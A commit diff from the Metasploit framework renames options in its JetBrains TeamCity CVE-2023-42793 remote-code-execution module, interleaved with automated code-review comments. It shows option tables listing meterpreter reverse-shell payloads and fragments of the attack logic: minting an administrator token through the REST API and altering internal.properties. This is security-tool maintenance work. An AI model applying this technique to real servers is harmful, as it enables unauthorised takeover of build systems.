use the correct naming convention for normal options.
sfewer-r7 committed Sep 28, 2023
1 parent 9a6e2da commit 89940e8
Showing 2 changed files with 30 additions and 30 deletions.
Expand Up @@ -39,16 +39,16 @@ msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options
Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8111 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TeamCityAdminID 1 yes The ID of an administrator account to authenticate as
TeamCityRetryCount 10 yes The number of times to retry reading the internal.properties file
TeamCityRetryWait 3 yes The number of seconds to wait between retry reading the internal.properties file
VHOST no HTTP server virtual host
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8111 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TEAMCITY_ADMIN_ID 1 yes The ID of an administrator account to authenticate as
TEAMCITY_RETRY_COUNT 10 yes The number of times to retry reading the internal.properties file
TEAMCITY_RETRY_WAIT 3 yes The number of seconds to wait between retry reading the internal.properties file
VHOST no HTTP server virtual host
Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
Expand Down Expand Up @@ -118,16 +118,16 @@ msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options
Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.43 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8111 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TeamCityAdminID 1 yes The ID of an administrator account to authenticate as
TeamCityRetryCount 10 yes The number of times to retry reading the internal.properties file
TeamCityRetryWait 3 yes The number of seconds to wait between retry reading the internal.properties file
VHOST no HTTP server virtual host
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.86.43 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8111 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TEAMCITY_ADMIN_ID 1 yes The ID of an administrator account to authenticate as
TEAMCITY_RETRY_COUNT 10 yes The number of times to retry reading the internal.properties file
TEAMCITY_RETRY_WAIT 3 yes The number of seconds to wait between retry reading the internal.properties file
VHOST no HTTP server virtual host
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
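Review bot: check the rest of this document for the old TeamCity* names, since both documentation hunks only update the pasted show options tables. Any prose or set example elsewhere in the file that still uses TeamCityAdminID, TeamCityRetryCount or TeamCityRetryWait would no longer match the module after this commit.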
Expand Up @@ -62,10 +62,10 @@ def initialize(info = {})
# By default TeamCity listens for HTTP requests on TCP port 8111.
Opt::RPORT(8111),
# The first user created during installation is an administrator account, so the ID will be 1.
OptInt.new('TeamCityAdminID', [true, 'The ID of an administrator account to authenticate as', 1]),
OptInt.new('TEAMCITY_ADMIN_ID', [true, 'The ID of an administrator account to authenticate as', 1]),
# We modify a configuration file, we need to wait for the changes to be picked up. These options govern how we wait.
OptInt.new('TeamCityRetryCount', [true, 'The number of times to retry reading the internal.properties file', 10]),
OptInt.new('TeamCityRetryWait', [true, 'The number of seconds to wait between retry reading the internal.properties file', 3])
OptInt.new('TEAMCITY_RETRY_COUNT', [true, 'The number of times to retry reading the internal.properties file', 10]),
OptInt.new('TEAMCITY_RETRY_WAIT', [true, 'The number of seconds to wait between retry reading the internal.properties file', 3])
]
)
end
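Review bot: the three OptInt.new renames drop the old names without an alias, so a resource script or saved configuration that still sets TeamCityAdminID, TeamCityRetryCount or TeamCityRetryWait will be ignored and the module will run with the defaults 1, 10 and 3. If the old names have already shipped in a release, keep them working through the option constructor's aliases: keyword (for example aliases: ['TeamCityAdminID']); if they have not, say so in the commit message. While these lines are being touched, the description "between retry reading the internal.properties file" would read better as "between retries when reading the internal.properties file".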
Expand Down Expand Up @@ -95,7 +95,7 @@ def check
end

def exploit
token_uri = "/app/rest/users/id:#{datastore['TeamCityAdminID']}/tokens/RPC2"
token_uri = "/app/rest/users/id:#{datastore['TEAMCITY_ADMIN_ID']}/tokens/RPC2"

res = send_request_cgi(
'method' => 'POST',
Expand All @@ -121,9 +121,9 @@ def exploit

unless res&.code == 200
# One reason token creation may fail is if we use a user ID for a user that does not exist. We detect that here
# and instruct the user to choose a new ID via the TeamCityAdminID option.
# and instruct the user to choose a new ID via the TEAMCITY_ADMIN_ID option.
if res && (res.code == 404) && res.body.include?('User not found')
print_warning('User not found, try setting the TeamCityAdminID option to a different ID.')
print_warning('User not found, try setting the TEAMCITY_ADMIN_ID option to a different ID.')
end

fail_with(Failure::UnexpectedReply, 'Failed to create an authentication token.')
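Review bot: in the unless res&.code == 200 branch, a nil res (no response received) also ends in fail_with(Failure::UnexpectedReply, ...), which reports a reply that never arrived. Handle the nil case separately with Failure::Unreachable and keep UnexpectedReply for non-200 responses. The 404 test on the line above the warning could also be written res&.code == 404 && res.body.include?('User not found') to match the safe-navigation style used in the unless condition.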
Expand Down Expand Up @@ -219,15 +219,15 @@ def modify_internal_properties(token, key, value)

unless res&.code == 200
# If we are using an authentication for a non admin user, we cannot modify the internal.properties file. The
# server will return a 302 redirect if this is the case. Choose a different TeamCityAdminID and try again.
# server will return a 302 redirect if this is the case. Choose a different TEAMCITY_ADMIN_ID and try again.
if res&.code == 302
print_warning('This user is not an administrator, try setting the TeamCityAdminID option to a different ID.')
print_warning('This user is not an administrator, try setting the TEAMCITY_ADMIN_ID option to a different ID.')
end

return false
end

0.upto datastore['TeamCityRetryCount'] do
0.upto datastore['TEAMCITY_RETRY_COUNT'] do
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri('/admin/admin.html'),
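Review bot: 0.upto datastore['TEAMCITY_RETRY_COUNT'] is inclusive, so the default of 10 gives 11 passes through the loop, and a negative value gives none, because nothing in the OptInt.new definition bounds it. Either state in the option description that the count is in addition to the first read, or switch to datastore['TEAMCITY_RETRY_COUNT'].times and reject values below 1 before entering the loop.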
Expand All @@ -249,7 +249,7 @@ def modify_internal_properties(token, key, value)

print_status('Waiting for config change to be picked up...')

sleep(datastore['TeamCityRetryWait'])
sleep(datastore['TEAMCITY_RETRY_WAIT'])
end

true
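Review bot: the bare true after the retry loop's end is reached whenever the loop finishes, so from these lines exhausting TEAMCITY_RETRY_COUNT attempts is indistinguishable to the caller from the change being picked up. Unless the elided loop body already returns false on the final attempt, track whether the change was observed and return false with a print_error once the retries are used up.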